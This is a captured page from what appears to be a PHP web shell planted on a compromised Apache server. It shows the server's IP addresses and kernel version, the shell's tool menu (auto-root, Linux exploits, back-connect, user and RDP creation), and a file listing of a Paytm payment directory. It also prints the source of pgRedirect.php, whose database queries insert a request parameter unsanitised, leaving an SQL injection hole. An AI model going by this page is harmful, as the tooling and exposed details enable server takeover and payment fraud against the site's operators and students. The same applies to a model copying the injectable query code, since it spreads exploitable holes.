Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 18.117.168.40
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
dud /
Paytm /
[ HOME SHELL ]
Name
Size
Permission
Action
PaytmKit
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxr-xr-x
links
[ DIR ]
drwxr-xr-x
.gitattributes
378
B
-rwxr-xr-x
TxnStatus.php
2.11
KB
-rwxr-xr-x
TxnTest.php
1.75
KB
-rwxr-xr-x
pgRedirect.php
2.82
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : pgRedirect.php
<?php header("Pragma: no-cache"); header("Cache-Control: no-cache"); header("Expires: 0"); // following files need to be included require_once("./lib/config_paytm.php"); require_once("./lib/encdec_paytm.php"); include("/var/www/config.php"); $servername = SERVERNAME; $username = USERNAME; $password = PASSWORD; $dbname = "logisys3_dud"; $conn = new mysqli($servername, $username, $password, $dbname); $checkSum = ""; $paramList = array(); $appno = $_REQUEST['productinfo']; $get_data = "SELECT ac.FAMOUNT AS FTOTAL,ac.FREGNO AS FREGNO,ac.FNAME AS FNAME,ac.FEMAIL AS FEMAIL, ac.FMOBILE AS FCONTACT_NO FROM dctran ac WHERE ac.FAPPNO='{$appno}'"; $result=$conn->query($get_data); if (mysqli_num_rows($result) > 0) { // output data of each row while($row = mysqli_fetch_assoc($result)) { $fregno = $row['FREGNO']; $ftotalfee = $row['FTOTAL']; } } $number = rand(10000000,99999999); $query = "update dctran set forderid = '{$number}' where fappno = '{$appno}'"; $res=$conn->query($query); $queru = "INSERT INTO `pgdet` (`ftype`, `appno`, fregno,`fappdate`, `fpaygateway`, `famount`, `forderid`,`fcreatedate`) VALUES ('CONVO', '{$appno}','{$fregno}', now(), 'Paytm','{$ftotalfee}', '{$number}',now())"; $res=$conn->query($queru); $ORDER_ID = $number;// $appno; $CUST_ID = $fregno; $INDUSTRY_TYPE_ID = 'EducationGovernment'; $CHANNEL_ID = 'WEB'; $TXN_AMOUNT = $ftotalfee; $paramList["MID"] = PAYTM_MERCHANT_MID; $paramList["ORDER_ID"] = $ORDER_ID; $paramList["CUST_ID"] = $CUST_ID; $paramList["MERC_UNQ_REF"] = $appno; $paramList["INDUSTRY_TYPE_ID"] = $INDUSTRY_TYPE_ID; $paramList["CHANNEL_ID"] = $CHANNEL_ID; $paramList["TXN_AMOUNT"] = $TXN_AMOUNT; $paramList["WEBSITE"] = PAYTM_MERCHANT_WEBSITE; $paramList["CALLBACK_URL"] = "https://universitysolutions.in/cnv/dud/pgResponse.php"; //$paramList["CALLBACK_URL"] = "http://logisys.net.in/results/kus/pgResponse.php"; /* $paramList["MSISDN"] = $MSISDN; //Mobile number of customer $paramList["EMAIL"] = $EMAIL; //Email ID of customer $paramList["VERIFIED_BY"] = "EMAIL"; // $paramList["IS_USER_VERIFIED"] = "YES"; // */ //Here checksum string will return by getChecksumFromArray() function. $checkSum = getChecksumFromArray($paramList,PAYTM_MERCHANT_KEY); ?> <html> <head> <title>Merchant Check Out Page</title> </head> <body> <center><h1>Please do not refresh this page...</h1></center> <form method="post" action="<?php echo PAYTM_TXN_URL ?>" name="f1"> <table border="1"> <tbody> <?php foreach($paramList as $name => $value) { echo '<input type="hidden" name="' . $name .'" value="' . $value . '">'; } ?> <input type="hidden" name="CHECKSUMHASH" value="<?php echo $checkSum ?>"> </tbody> </table> <script type="text/javascript"> document.f1.submit(); </script> </form> </body> </html>
Close